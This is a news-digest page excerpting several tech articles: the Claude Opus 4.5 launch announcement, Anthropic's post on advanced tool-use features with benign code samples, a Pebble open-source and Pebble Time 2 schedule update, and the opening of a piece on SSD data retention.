10 interesting stories served every morning and every evening.
Our newest model, Claude Opus 4.5, is available today. It's intelligent, efficient, and the best model in the world for coding, agents, and computer use. It's also meaningfully better at everyday tasks like deep research and working with slides and spreadsheets. Opus 4.5 is a step forward in what AI systems can do, and a preview of larger changes to how work gets done. Claude Opus 4.5 is state-of-the-art on tests of real-world software engineering.

Opus 4.5 is available today on our apps, our API, and on all three major cloud platforms. If you're a developer, simply use claude-opus-4-5-20251101 via the Claude API. Pricing is now $5/$25 per million tokens—making Opus-level capabilities accessible to even more users, teams, and enterprises.

Alongside Opus, we're releasing updates to the Claude Developer Platform, Claude Code, and our consumer apps. There are new tools for longer-running agents and new ways to use Claude in Excel, Chrome, and on desktop. In the Claude apps, lengthy conversations no longer hit a wall. See our product-focused section below for details.

As our Anthropic colleagues tested the model before release, we heard remarkably consistent feedback. Testers noted that Claude Opus 4.5 handles ambiguity and reasons about tradeoffs without hand-holding. They told us that, when pointed at a complex, multi-system bug, Opus 4.5 figures out the fix. They said that tasks that were near-impossible for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 just "gets it."

Many of our customers with early access have had similar experiences. Here are some examples of what they told us:

* Opus models have always been "the real SOTA" but have been cost prohibitive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It's the clear winner and exhibits the best frontier task planning and tool calling we've seen yet.
* Claude Opus 4.5 delivers high-quality code and excels at powering heavy-duty agentic workflows with GitHub Copilot. Early testing shows it surpasses internal coding benchmarks while cutting token usage in half, and is especially well-suited for tasks like code migration and code refactoring.
* Claude Opus 4.5 beats Sonnet 4.5 and competition on our internal benchmarks, using fewer tokens to solve the same problems. At scale, that efficiency compounds.
* Claude Opus 4.5 delivers frontier reasoning within Lovable's chat mode, where users plan and iterate on projects. Its reasoning depth transforms planning—and great planning makes code generation even better.
* Claude Opus 4.5 excels at long-horizon, autonomous tasks, especially those that require sustained reasoning and multi-step execution. In our evaluations it handled complex workflows with fewer dead-ends. On Terminal Bench it delivered a 15% improvement over Sonnet 4.5, a meaningful gain that becomes especially clear when using Warp's Planning Mode.
* Claude Opus 4.5 achieved state-of-the-art results for complex enterprise tasks on our benchmarks, outperforming previous models on multi-step reasoning tasks that combine information retrieval, tool use, and deep analysis.
* Claude Opus 4.5 delivers measurable gains where it matters most: stronger results on our hardest evaluations and consistent performance through 30-minute autonomous coding sessions.
* Claude Opus 4.5 represents a breakthrough in self-improving AI agents.
For office automation, our agents were able to autonomously refine their own capabilities—achieving peak performance in 4 iterations while other models couldn't match that quality after 10.
* Claude Opus 4.5 is a notable improvement over the prior Claude models inside Cursor, with improved pricing and intelligence on difficult coding tasks.
* Claude Opus 4.5 is yet another example of Anthropic pushing the frontier of general intelligence. It performs exceedingly well across difficult coding tasks, showcasing long-term goal-directed behavior.
* Claude Opus 4.5 delivered an impressive refactor spanning two codebases and three coordinated agents. It was very thorough, helping develop a robust plan, handling the details and fixing tests. A clear step forward from Sonnet 4.5.
* Claude Opus 4.5 handles long-horizon coding tasks more efficiently than any model we've tested. It achieves higher pass rates on held-out tests while using up to 65% fewer tokens, giving developers real cost control without sacrificing quality.
* We've found that Opus 4.5 excels at interpreting what users actually want, producing shareable content on the first try. Combined with its speed, token efficiency, and surprisingly low cost, it's the first time we're making Opus available in Notion Agent.
* Claude Opus 4.5 excels at long-context storytelling, generating 10-15 page chapters with strong organization and consistency. It's unlocked use cases we couldn't reliably deliver before.
* Claude Opus 4.5 sets a new standard for Excel automation and financial modeling. Accuracy on our internal evals improved 20%, efficiency rose 15%, and complex tasks that once seemed out of reach became achievable.
* Claude Opus 4.5 is the only model that nails some of our hardest 3D visualizations. Polished design, tasteful UX, and excellent planning & orchestration - all with more efficient token usage. Tasks that took previous models 2 hours now take thirty minutes.
* Claude Opus 4.5 catches more issues in code reviews without sacrificing precision. For production code review at scale, that reliability matters.
* Based on testing with Junie, our coding agent, Claude Opus 4.5 outperforms Sonnet 4.5 across all benchmarks. It requires fewer steps to solve tasks and uses fewer tokens as a result. This indicates that the new model is more precise and follows instructions more effectively — a direction we're very excited about.
* The effort parameter is brilliant. Claude Opus 4.5 feels dynamic rather than overthinking, and at lower effort delivers the same quality we need while being dramatically more efficient. That control is exactly what our SQL workflows demand.
* We're seeing 50% to 75% reductions in both tool calling errors and build/lint errors with Claude Opus 4.5. It consistently finishes complex tasks in fewer iterations with more reliable execution.
* Claude Opus 4.5 is smooth, with none of the rough edges we've seen from other frontier models. The speed improvements are remarkable.

We give prospective performance engineering candidates a notoriously difficult take-home exam. We also test new models on this exam as an internal benchmark. Within our prescribed 2-hour time limit, Claude Opus 4.5 scored higher than any human candidate ever.[1]

The take-home test is designed to assess technical ability and judgment under time pressure. It doesn't test for other crucial skills candidates may possess, like collaboration, communication, or the instincts that develop over years.
But this result—where an AI model outperforms strong candidates on important technical skills—raises questions about how AI will change engineering as a profession. Our Societal Impacts and Economic Futures research is aimed at understanding these kinds of changes across many fields. We plan to share more results soon.

Software engineering isn't the only area in which Claude Opus 4.5 has improved. Capabilities are higher across the board—Opus 4.5 has better vision, reasoning, and mathematics skills than its predecessors, and it is state-of-the-art in many domains:[2]

* Opus 4.5 writes better code, leading across 7 out of 8 programming languages on SWE-bench Multilingual.
* Opus 4.5 can solve challenging coding problems with ease, with a 10.6% jump over Sonnet 4.5 on Aider Polyglot.
* Opus 4.5 improves on frontier agentic search with a significant jump on BrowseComp-Plus.
* Opus 4.5 stays on track over the long haul, earning 29% more than Sonnet 4.5 on Vending-Bench.

The model's capabilities outpace some of the benchmarks we use in our tests. A common benchmark for agentic capabilities is τ2-bench, which measures the performance of agents in real-world, multi-turn tasks. In one scenario, models have to act as an airline service agent helping a distressed customer. The benchmark expects models to refuse a modification to a basic economy booking since the airline doesn't allow changes to that class of tickets. Instead, Opus 4.5 found an insightful (and legitimate) way to solve the problem: upgrade the cabin first, then modify the flights.

Let me think about what options I have within my policy:
1. Modify flights - Basic economy cannot be modified. This is clear in the policy.
2. Change cabin - Wait, let me check this option! The policy says:
“In other cases, all reservations, including basic economy, can change cabin without changing the flights.”
But he wants to change the flights, not just the cabin. However, what if we:
- Change the cabin first (which IS allowed for basic economy), then
- Change the flights (which is allowed for non-basic economy)
So the strategy could be:
1. Upgrade his cabin from basic economy to economy (or business)
2. Then modify the flights to be 2 days later
This would cost more money, but it's a legitimate path within the policy!

The benchmark technically scored this as a failure because Claude's way of helping the customer was unanticipated. But this kind of creative problem solving is exactly what we've heard about from our testers and customers—it's what makes Claude Opus 4.5 feel like a meaningful step forward.

In other contexts, finding clever paths around intended constraints could count as reward hacking—where models "game" rules or objectives in unintended ways. Preventing such misalignment is one of the objectives of our safety testing, discussed in the next section.

As we state in our system card, Claude Opus 4.5 is the most robustly aligned model we have released to date and, we suspect, the best-aligned frontier model by any developer. It continues our trend towards safer and more secure models. In our evaluation, "concerning behavior" scores measure a very wide range of misaligned behavior, including both cooperation with human misuse and undesirable actions that the model takes at its own initiative [3].

Our customers often use Claude for critical tasks. They want to be assured that, in the face of malicious attacks by hackers and cybercriminals, Claude has the training and the "street smarts" to avoid trouble. With Opus 4.5, we've made substantial progress in robustness against prompt injection attacks, which smuggle in deceptive instructions to fool the model into harmful behavior. Opus 4.5 is harder to trick with prompt injection than any other frontier model in the industry. Note that this benchmark includes only very strong prompt injection attacks; it was developed and run by Gray Swan.

You can find a detailed description of all our capability and safety evaluations in the Claude Opus 4.5 system card.

New on the Claude Developer Platform

As models get smarter, they can solve problems in fewer steps: less backtracking, less redundant exploration, less verbose reasoning. Claude Opus 4.5 uses dramatically fewer tokens than its predecessors to reach similar or better outcomes.

But different tasks call for different tradeoffs. Sometimes developers want a model to keep thinking about a problem; sometimes they want something more nimble. With our new effort parameter on the Claude API, you can decide to minimize time and spend or maximize capability. Set to a medium effort level, Opus 4.5 matches Sonnet 4.5's best score on SWE-bench Verified, but uses 76% fewer output tokens. At its highest effort level, Opus 4.5 exceeds Sonnet 4.5's performance by 4.3 percentage points—while using 48% fewer tokens.

With effort control, context compaction, and advanced tool use, Claude Opus 4.5 runs longer, does more, and requires less intervention. Our context management and memory capabilities can dramatically boost performance on agentic tasks. Opus 4.5 is also very effective at managing a team of subagents, enabling the construction of complex, well-coordinated multi-agent systems. In our testing, the combination of all these techniques boosted Opus 4.5's performance on a deep research evaluation by almost 15 percentage points.[4]

We're making our Developer Platform more composable over time. We want to give you the building blocks to construct exactly what you need, with full control over efficiency, tool use, and context management.
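As a rough illustration, here is a minimal sketch of calling Opus 4.5 from the Python SDK with a reduced effort setting. The model ID is the one given above; the exact name and placement of the effort control are assumptions made for illustration, so check the API documentation before relying on them.

import anthropic

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

# Hypothetical illustration: the effort control is passed via extra_body because
# its exact field name and location in the SDK may differ; consult the API docs.
response = client.messages.create(
    model="claude-opus-4-5-20251101",
    max_tokens=2048,
    messages=[{"role": "user", "content": "Summarize the failing test and propose a fix."}],
    extra_body={"effort": "medium"},  # assumed field name for the new effort parameter
)
print(response.content[0].text)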
Products like Claude Code show what's possible when the kinds of upgrades we've made to the Claude Developer Platform come together. Claude Code gains two upgrades with Opus 4.5. Plan Mode now builds more precise plans and executes more thoroughly—Claude asks clarifying questions upfront, then builds a user-editable plan.md file before executing. Claude Code is also now available in our desktop app, letting you run multiple local and remote sessions in parallel: perhaps one agent fixes bugs, another researches GitHub, and a third updates docs.

For Claude app users, long conversations no longer hit a wall—Claude automatically summarizes earlier context as needed, so you can keep the chat going. Claude for Chrome, which lets Claude handle tasks across your browser tabs, is now available to all Max users. We announced Claude for Excel in October, and as of today we've expanded beta access to all Max, Team, and Enterprise users. Each of these updates takes advantage of Claude Opus 4.5's market-leading performance in using computers and spreadsheets and in handling long-running tasks.

For Claude and Claude Code users with access to Opus 4.5, we've removed Opus-specific caps. For Max and Team Premium users, we've increased overall usage limits, meaning you'll have roughly the same number of Opus tokens as you previously had with Sonnet. We're updating usage limits to make sure you're able to use Opus 4.5 for daily work. These limits are specific to Opus 4.5; as future models surpass it, we expect to update limits as needed.
...
Read the original on www.anthropic.com »
* Yesterday, Pebble watch software was ~95% open source. Today, it’s 100% open source. You can download, compile and run all the software you need to use your Pebble. We just published the source code for the new Pebble mobile app!
* Pebble Appstore now has a publicly available backup and supports multiple feeds, providing long term reliability through decentralization. We’ve launched our own feed and Developer Dashboard.
* Pebble Time 2 schedule update (aiming to begin shipping in January, with most arriving on wrists in March/April)
* New Tick Talk episode #4 is up, with Pebble Time 2 demos!
Pre-production Pebble Time 2 (Black/Red colourway) in all its glory
Over the last year, and especially in the last week, I’ve chatted with tons of people in the Pebble community. One of the main questions people have is ‘how do I know that my new Pebble watch will continue to work long into the future?’. It’s an extremely valid question and concern - one that I share as a fellow Pebble wearer. I called this out specifically in my blog post announcing the relaunch in January 2025. How is this time round going to be different from last time?
There are two pieces to making Pebble sustainable long term - hardware and software.
Nothing lasts forever, especially an inexpensive gadget like a Pebble. We want to be able to keep manufacturing these watches long into the future - mostly because I will always want one on my wrist! The company I set up to relaunch Pebble, Core Devices, is self funded, built without investors, and extremely lean. As long as we stay profitable (ie we don’t lose money), we will continue to manufacture new watches.
We’re also making sure that our new watches are more repairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can remove the back cover and replace the battery.
We’ve also published electrical and mechanical design files for Pebble 2 Duo. Yes, you can download the schematic (includes KiCad project files) right now on Github! This should give you a nice jumpstart to designing your own PebbleOS-compatible device.
Last time round, barely any of the Pebble software was open source. This made it very hard for the Pebble community to make improvements to their watches after the company behind Pebble shut down. Things are different now! This whole relaunch came about primarily because Google open sourced PebbleOS (thank you!). Yesterday, the software that powers Pebble watches was around 95% open source. As of today, it’s now 100%. This means that if Core Devices were to disappear into a black hole, you have all the source code you need to build, run and improve the software behind your Pebble.
I confess that I misunderstood why 95% was much less sustainable than 100% until recently. I discuss this in more detail in my latest Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to sideload the old Pebble APK on my phone, but iPhone and other Android users have basically been stuck without an easily available Pebble mobile companion app for years.
Here’s how we’re making sure the 3 main Pebble software components are open source and guaranteed to work long into the future:
PebbleOS - software that runs on your watch itself. This has been 100% open source since January and we’ve committed to open sourcing all the improvements we’ve made → github.com/coredevices/PebbleOS. You can download the source code, compile PebbleOS and easily install it over Bluetooth on your new Pebble. Textbook definition of open source!
Pebble mobile companion app - the app for your iPhone or Android. Without the app, your Pebble is basically a paperweight. When Pebble Tech Corp died, the lack of an open source mobile app made it difficult for anyone to continue to use their watches. We had to build an entirely new app (get it here). Today, our app is now 100% open source on Github - ensuring that what happened before cannot happen again. Want to learn more about how we built the new app cross platform using Kotlin Multiplatform? Watch Steve's presentation at Droidcon.
Developer tools and Pebble Appstore - this software enables people to build and share their watchapps and watchfaces.
In the case of dev tools, just being open source is not enough. They needed to be updated to work on modern computers. Before we made improvements, the state of the art of Pebble app development was using an Ubuntu virtualbox VM with Python2! Over the summer, our incredibly productive intern upgraded all the SDK and dev tools and created a new way to develop Pebble apps in the browser. You should check them out!
Then there's the Pebble Appstore. This is a collection of nearly 15,000 watchfaces and watchapps that you - the Pebble community - developed between 2012 and July 2018. When Fitbit pulled the plug on the original Pebble Appstore, the Rebble Foundation downloaded a copy of all the apps and faces, and set up a new web service to let users of the old Pebble app continue to download and use watchfaces. This was an incredible effort, one that I have used thousands of times and of which I am a happy paying subscriber. But it's still centralized - if their server disappears, there is no freely available backup.
To compensate for that, today we’re launching two new things:
* The Pebble mobile app will soon (later this week) be able to subscribe to multiple appstore ‘feeds’. This is similar to open source package managers like pip, AUR, APT, etc. Anyone can create a Pebble-compatible appstore feed and users will be able to browse apps from that feed in the Pebble mobile app.
* We’ve created our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi powered by 100% new software) is configured to back up an archive of all apps and faces to Archive.org (backup will gradually complete over the next week). Today, our feed only has a subset of all Pebble watchfaces and apps (thank you aveao for creating Pebble Archive!). Developers - you can upload your existing or new apps right now! We hope that this sets a standard for openness and we encourage all feeds to publish a freely and publicly available archive.
Important to note - developers will still be able to charge money for their apps and faces, using Kiezel pay or other services. This change does not preclude them from doing that, in fact it makes it even easier - I could see some developers creating a paid-only feed. As I recently wrote, we’re also working on other ways for Pebble developers to earn money by publishing fun, beautiful and creative Pebble apps.
Another important note - some binary blobs and other non-free software components are used today in PebbleOS and the Pebble mobile app (ex: the heart rate sensor on PT2 , Memfault library, and others). Optional non-free web services, like Wispr-flow API speech recognizer, are also used. These non-free software components are not required - you can compile and run Pebble watch software without them. This will always be the case. More non-free software components may appear in our software in the future. The core Pebble watch software stack (everything you need to use your Pebble watch) will always be open source.
Pre-production Pebble Time 2. These watches are not final quality! We are still tweaking and tuning everything.
We’re currently in the middle of Pebble Time 2 design verification test (DVT) phase. After we finish that, we go into production verification test (PVT) and then mass production (MP). So far, things are proceeding according to the schedule update I shared last month but that is extraordinarily subject to change. We still have a lot of testing (especially waterproof and environmental) to go. If we find problems (which is likely) we will push the schedule back to make improvements to the product.
The one major complicating factor is the timing of Chinese New Year (CNY). It’s early next year - factories will shut down for 3 weeks starting around the end of January. After restarting, things always take a week or two to get back to full speed.
We are trying our best to get into mass production and ship out at most several thousand Pebble Time 2s before CNY. It’s going to be very tight 🤞. More likely is that production will begin after CNY, then we need to transfer the watches to our fulfillment center, and ship them out. Realistically, at this time we’re forecasting that the majority of people will receive their PT2 in March and April. Please keep in mind that things may still change.
There will be 4 colour options for PT2 - black/black, black/red, silver/blue, silver/(white most likely). Let me be crystal clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email asking everyone who pre-ordered a Pebble Time 2 to select which colour they would like to receive. Please do not email us asking when this email will be sent out. No one has been invited yet to do this. I will post here after all emails have gone out.
On a related note, I am extremely happy that we built and shipped Pebble 2 Duo. Not only is it an awesome watch, it was also a phenomenal way for us to exercise our production muscles and ease back into the systematic flow of building and shipping smartwatches.
A video is worth a million words - so I encourage you to watch me demo the Pebble Time 2 watches I just received this week. Keep in mind these watches are PRE-PRODUCTION, which means their parts have imperfect qualities! Subject to change!
The video below opens to the part of the video where I do the demo.
...
Read the original on ericmigi.com »
The future of AI agents is one where models work seamlessly across hundreds or thousands of tools: an IDE assistant that integrates git operations, file manipulation, package managers, testing frameworks, and deployment pipelines; an operations coordinator that connects Slack, GitHub, Google Drive, Jira, company databases, and dozens of MCP servers simultaneously. To be effective, agents need to work with unlimited tool libraries without stuffing every definition into context upfront. Our blog article on using code execution with MCP discussed how tool results and definitions can sometimes consume 50,000+ tokens before an agent reads a request. Agents should discover and load tools on-demand, keeping only what's relevant for the current task.

Agents also need the ability to call tools from code. When using natural language tool calling, each invocation requires a full inference pass, and intermediate results pile up in context whether they're useful or not. Code is a natural fit for orchestration logic, such as loops, conditionals, and data transformations. Agents need the flexibility to choose between code execution and inference based on the task at hand.

Agents also need to learn correct tool usage from examples, not just schema definitions. JSON schemas define what's structurally valid, but can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

Today, we're releasing three features that make this possible:

* Tool Search Tool, which allows Claude to use search tools to access thousands of tools without consuming its context window
* Programmatic Tool Calling, which allows Claude to invoke tools in a code execution environment, reducing the impact on the model's context window
* Tool Use Examples, which provides a universal standard for demonstrating how to effectively use a given tool

In internal testing, we've found these features have helped us build things that wouldn't have been possible with conventional tool use patterns. For example, Claude for Excel uses Programmatic Tool Calling to read and modify spreadsheets with thousands of rows without overloading the model's context window. Based on our experience, we believe these features open up new possibilities for what you can build with Claude.

MCP tool definitions provide important context, but as more servers connect, those tokens can add up. Consider a five-server setup: that's 58 tools consuming approximately 55K tokens before the conversation even starts. Add more servers like Jira (which alone uses ~17K tokens) and you're quickly approaching 100K+ token overhead. At Anthropic, we've seen tool definitions consume 134K tokens before optimization.

But token cost isn't the only issue. The most common failures are wrong tool selection and incorrect parameters, especially when tools have similar names like notification-send-user vs. notification-send-channel.

Instead of loading all tool definitions upfront, the Tool Search Tool discovers tools on-demand. Claude only sees the tools it actually needs for the current task. In our measurements, the Tool Search Tool preserves 191,300 tokens of available context, compared to 122,800 with Claude's traditional approach. This represents an 85% reduction in token usage while maintaining access to your full tool library. Internal testing showed significant accuracy improvements on MCP evaluations when working with large tool libraries.
Opus 4 improved from 49% to 74%, and Opus 4.5 improved from 79.5% to 88.1% with the Tool Search Tool enabled.

The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren't loaded into Claude's context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).

When Claude needs specific capabilities, it searches for relevant tools. The Tool Search Tool returns references to matching tools, which get expanded into full definitions in Claude's context. For example, if Claude needs to interact with GitHub, it searches for "github," and only github.createPullRequest and github.listIssues get loaded—not your other 50+ tools from Slack, Jira, and Google Drive. This way, Claude has access to your full tool library while only paying the token cost for tools it actually needs.

Prompt caching note: the Tool Search Tool doesn't break prompt caching because deferred tools are excluded from the initial prompt entirely. They're only added to context after Claude searches for them, so your system prompt and core tool definitions remain cacheable.

{
  "tools": [
    // Include a tool search tool (regex, BM25, or custom)
    {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
    // Mark tools for on-demand discovery
    {
      "name": "github.createPullRequest",
      "description": "Create a pull request",
      "input_schema": {...},
      "defer_loading": true
    }
    // ... hundreds more deferred tools with defer_loading: true
  ]
}
For MCP servers, you can defer loading entire servers while keeping specific high-use tools loaded:

{
  "type": "mcp_toolset",
  "mcp_server_name": "google-drive",
  "default_config": {"defer_loading": true},  # defer loading the entire server
  "configs": {
    "search_files": {
      "defer_loading": false  # keep the most used tool loaded
    }
  }
}

The Claude Developer Platform provides regex-based and BM25-based search tools out of the box, but you can also implement custom search tools using embeddings or other strategies.

When to use the Tool Search Tool

Like any architectural decision, enabling the Tool Search Tool involves trade-offs. The feature adds a search step before tool invocation, so it delivers the best ROI when the context savings and accuracy improvements outweigh the additional latency. Use it when you have a large tool library and only a subset is relevant to any given task; skip it when all tools are used frequently in every session.

Traditional tool calling creates two fundamental problems as workflows become more complex:

Context pollution from intermediate results: When Claude analyzes a 10MB log file for error patterns, the entire file enters its context window, even though Claude only needs a summary of error frequencies. When fetching customer data across multiple tables, every record accumulates in context regardless of relevance. These intermediate results consume massive token budgets and can push important information out of the context window entirely.

Inference overhead and manual synthesis: Each tool call requires a full model inference pass. After receiving results, Claude must "eyeball" the data to extract relevant information, reason about how pieces fit together, and decide what to do next—all through natural language processing. A five-tool workflow means five inference passes plus Claude parsing each result, comparing values, and synthesizing conclusions. This is both slow and error-prone.

Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips. Instead of Claude requesting tools one at a time with each result being returned to its context, Claude writes code that calls multiple tools, processes their outputs, and controls what information actually enters its context window.

Claude excels at writing code, and by letting it express orchestration logic in Python rather than through natural language tool invocations, you get more reliable, precise control flow. Loops, conditionals, data transformations, and error handling are all explicit in code rather than implicit in Claude's reasoning.

Consider a common business task: "Which team members exceeded their Q3 travel budget?" You have three tools available: one that lists a department's team members, one that fetches a person's quarterly expenses, and one that looks up the budget for a given level.

Without programmatic calling, the workflow looks like this: for each person, fetch their Q3 expenses (20 tool calls, each returning 50-100 line items: flights, hotels, meals, receipts). All of this enters Claude's context: 2,000+ expense line items (50 KB+). Claude then manually sums each person's expenses, looks up their budget, and compares expenses against budget limits. The result is more round-trips to the model and significant context consumption.

Instead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they're processed by the script rather than consumed by the model. The script continues executing, and Claude only sees the final output. This also allows for parallel tool execution.

Here's what Claude's orchestration code looks like for the budget compliance task:

team = await get_team_members("engineering")
# Fetch budgets for each unique level
levels = list(set(m["level"] for m in team))
budget_results = await asyncio.gather(*[
    get_budget_by_level(level) for level in levels
])
# Create a lookup dictionary: {"junior": budget1, "senior": budget2, ...}
budgets = {level: budget for level, budget in zip(levels, budget_results)}

# Fetch all expenses in parallel
expenses = await asyncio.gather(*[
    get_expenses(m["id"], "Q3") for m in team
])

# Find employees who exceeded their travel budget
exceeded = []
for member, exp in zip(team, expenses):
    budget = budgets[member["level"]]
    total = sum(e["amount"] for e in exp)
    if total > budget["travel_limit"]:
        exceeded.append({
            "name": member["name"],
            "spent": total,
            "limit": budget["travel_limit"]
        })

print(json.dumps(exceeded))

Claude's context receives only the final result: the two to three people who exceeded their budget. The 2,000+ line items, the intermediate sums, and the budget lookups do not affect Claude's context, reducing consumption from 200KB of raw expense data to just 1KB of results.

Token savings: By keeping intermediate results out of Claude's context, PTC dramatically reduces token consumption. Average usage dropped from 43,588 to 27,297 tokens, a 37% reduction on complex research tasks.

Reduced latency: Each API round-trip requires model inference (hundreds of milliseconds to seconds). When Claude orchestrates 20+ tool calls in a single code block, you eliminate 19+ inference passes. The API handles tool execution without returning to the model each time.

Improved accuracy: By writing explicit orchestration logic, Claude makes fewer errors than when juggling multiple tool results in natural language. Internal knowledge retrieval improved from 25.6% to 28.5%; GIA benchmarks from 46.5% to 51.2%.

Production workflows involve messy data, conditional logic, and operations that need to scale. Programmatic Tool Calling lets Claude handle that complexity programmatically while keeping its focus on actionable results rather than raw data processing.

Add code_execution to tools, and set allowed_callers to opt-in tools for programmatic execution:
{
  "tools": [
    {
      "type": "code_execution_20250825",
      "name": "code_execution"
    },
    {
      "name": "get_team_members",
      "description": "Get all members of a department...",
      "input_schema": {...},
      "allowed_callers": ["code_execution_20250825"]  # opt-in to programmatic tool calling
    },
    {
      "name": "get_expenses",
      ...
    },
    {
      "name": "get_budget_by_level",
      ...
    }
  ]
}

The API converts these tool definitions into Python functions that Claude can call. Instead of requesting tools one at a time, Claude generates Python code:
{
  "type": "server_tool_use",
  "id": "srvtoolu_abc",
  "name": "code_execution",
  "input": {
    "code": "team = get_team_members('engineering')\n..."  # the code example above
  }
}

When the code calls get_expenses(), you receive a tool request with a caller field. You provide the result, which is processed in the Code Execution environment rather than Claude's context. This request-response cycle repeats for each tool call in the code.

When the code finishes running, only the results of the code are returned to Claude. This is all Claude sees, not the 2,000+ expense line items processed along the way.

When to use Programmatic Tool Calling

Programmatic Tool Calling adds a code execution step to your workflow. This extra overhead pays off when the token savings, latency improvements, and accuracy gains are substantial. Use it when you are:

* Processing large datasets where you only need aggregates or summaries
* Running multi-step workflows with three or more dependent tool calls
* Filtering, sorting, or transforming tool results before Claude sees them
* Running parallel operations across many items (checking 50 endpoints, for example)

Skip it for tasks where Claude should see and reason about all intermediate results.

JSON Schema excels at defining structure (types, required fields, allowed enums), but it can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects. For example:

* Format ambiguity: Should due_date use "2024-11-06", "Nov 6, 2024", or "2024-11-06T00:00:00Z"?
* ID conventions: Is reporter.id a UUID, "USR-12345", or just "12345"?
* Parameter correlations: How do escalation.level and escalation.sla_hours relate to priority?

These ambiguities can lead to malformed tool calls and inconsistent parameter usage. Tool Use Examples let you provide sample tool calls directly in your tool definitions. Instead of relying on schema alone, you show Claude concrete usage patterns:
{
  "name": "create_ticket",
  "input_schema": { /* same schema as above */ },
  "input_examples": [
    {
      "title": "Login page returns 500 error",
      "priority": "critical",
      "labels": ["bug", "authentication", "production"],
      "reporter": {
        "id": "USR-12345",
        "name": "Jane Smith",
        "contact": {
          "email": "jane@acme.com",
          "phone": "+1-555-0123"
        }
      },
      "due_date": "2024-11-06",
      "escalation": {
        "level": 2,
        "notify_manager": true,
        "sla_hours": 4
      }
    },
    {
      "title": "Add dark mode support",
      "labels": ["feature-request", "ui"],
      "reporter": {
        "id": "USR-67890",
        "name": "Alex Chen"
      }
    },
    {
      "title": "Update API documentation"
    }
  ]
}

From these three examples, Claude learns:

* Nested structure patterns: how to construct the reporter object with its nested contact object
* Optional parameter correlations: critical bugs have full contact info plus escalation with tight SLAs; feature requests have a reporter but no contact/escalation; internal tasks have a title only

In our own internal testing, tool use examples improved accuracy from 72% to 90% on complex parameter handling.

When to use Tool Use Examples

Tool Use Examples add tokens to your tool definitions, so they're most valuable when the accuracy improvements outweigh the additional cost. They help most for:

* Tools with many optional parameters, where inclusion patterns matter
* APIs with domain-specific conventions not captured in schemas
* Similar tools where examples clarify which one to use (e.g., create_ticket vs create_incident)

Skip them for standard formats like URLs or emails that Claude already understands.

Building agents that take real-world actions means handling scale, complexity, and precision simultaneously. These three features work together to solve different bottlenecks in tool use workflows. Here's how to combine them effectively. Not every agent needs to use all three features for a given task. Start with your biggest bottleneck. This focused approach lets you address the specific constraint limiting your agent's performance, rather than adding complexity upfront. Then layer additional features as needed. They're complementary: Tool Search Tool ensures the right tools are found, Programmatic Tool Calling ensures efficient execution, and Tool Use Examples ensure correct invocation.

Set up Tool Search Tool for better discovery

Tool search matches against names and descriptions, so clear, descriptive definitions improve discovery accuracy.

// Good
{
  "name": "search_customer_orders",
  "description": "Search for customer orders by date range, status, or total amount. Returns order details including items, shipping, and payment info."
}
// Bad
{
  "name": "query_db_orders",
  "description": "Execute order query"
}

Add system prompt guidance so Claude knows what's available:

You have access to tools for Slack messaging, Google Drive file management,
Jira ticket tracking, and GitHub repository operations. Use the tool search
to find specific capabilities.

Keep your three to five most-used tools always loaded, defer the rest. This balances immediate access for common operations with on-demand discovery for everything else.

Since Claude writes code to parse tool outputs, document return formats clearly. This helps Claude write correct parsing logic:

{
  "name": "get_orders",
  "description": "Retrieve orders for a customer.
    Returns:
      List of order objects, each containing:
      - id (str): Order identifier
      - total (float): Order total in USD
      - status (str): One of 'pending', 'shipped', 'delivered'
      - items (list): Array of {sku, quantity, price}
      - created_at (str): ISO 8601 timestamp"
}

Opt in tools that benefit from programmatic orchestration, such as tools that can run in parallel (independent operations).

Set up Tool Use Examples for parameter accuracy

* Use realistic data (real city names, plausible prices, not "string" or "value")
* Keep it concise: 1-5 examples per tool
* Focus on ambiguity (only add examples where correct usage isn't obvious from schema)

These features are available in beta. To enable them, add the beta header and include the tools you need:

client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=4096,
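The call above is truncated in this excerpt. For orientation, here is a minimal self-contained sketch that combines the beta flag with a deferred tool; the beta name, tool types, and defer_loading field are taken from the examples above, while the user message, the simplified schema, and the final print are illustrative placeholders.

import anthropic

client = anthropic.Anthropic()

# Illustrative sketch based on the field names shown above; not a complete recipe.
response = client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=4096,
    tools=[
        {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
        {
            "name": "github.createPullRequest",
            "description": "Create a pull request",
            "input_schema": {"type": "object", "properties": {}},  # simplified schema
            "defer_loading": True,
        },
    ],
    messages=[{"role": "user", "content": "Open a PR that bumps the CI Node version."}],
)
print(response.stop_reason)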
...
Read the original on www.anthropic.com »
After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).
SSDs have all but replaced hard drives when it comes to primary storage. They’re orders of magnitude faster, more convenient, and consume less power than mechanical hard drives. That said, if you’re also using SSDs for cold storage, expecting the drives lying in your drawer to work perfectly after years, you might want to rethink your strategy. Your reliable SSD could suffer from corrupted or lost data if left unpowered for extended periods. This is why many users don’t consider SSDs a reliable long-term storage medium, and prefer using hard drives, magnetic tape, or M-Disc instead.
Your SSD data isn’t as permanent as you think
